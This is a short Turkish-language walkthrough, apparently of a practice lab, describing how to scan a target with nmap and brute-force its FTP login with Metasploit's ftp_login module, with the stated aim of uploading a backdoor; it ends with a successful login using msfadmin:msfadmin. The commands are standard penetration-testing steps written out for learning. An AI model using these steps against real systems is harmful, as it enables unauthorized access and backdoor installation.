sızma: ftp servisine brute force yaparak ftp login bilgilerini elde edeceğim bu sayede ftp üzerinden sisteme backdoor yükleyebilirim.
modül: auxiliary/scanner/ftp/ftp_login
Adım 1: Aktif Bilgi Toplama
"nmap" yazılımının "-sV,-p-,--open" parametreleriyle hedefe sistemde port taraması yapıyorum.
-sV : versiyon bilgisini vereceği anlamına gelir.
-p- : tüm portların taranacağı anlamına gelir.
--open : sadece açık portların gösterileceği anlamına gelir.
görüldüğü gibi 21 ve 2121 portunu ftp servisleri kullanmaktadır.
Adım 2: Erişim Elde Etme
metasploit’in hatasız çalışması için postgresql servisini başlatıyorum.
"msfconsole -q" : metasploit’i banner’sız çalıştırıyorum.
"search ftp" : ftp ile alakalı arama yapıyorum.
"use auxiliary/scanner/ftp/ftp_login" : brute force işlemini gerçekleştirecek modülü açıyorum.
"show options" : modülün ayarlarını görüyorum.
"set RHOSTS" : hedef sistemin ip adresini veriyorum.
"set RPORT" : hedef sistemde ftp servislerinden birinin çalıştığı portu veriyorum.
"set USER_FILE" : FTP bilgisinde kullanıcı adı olarak deneme yapacağı wordlisti seçiyorum.
"set PASS_FILE" : FTP bilgisinde parola olarak deneme yapacağı wordlisti seçiyorum.
"run" : modülü çalıştırıyorum
ve puf ! başarılı msfadmin:msfadmin ile ftp’ye giriş yapabiliyormuşum.
